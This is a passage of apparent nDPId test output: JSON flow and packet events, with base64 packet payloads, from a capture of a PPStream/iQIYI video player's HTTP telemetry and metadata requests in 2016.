8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm
8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
+01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} +01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=
="} +01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 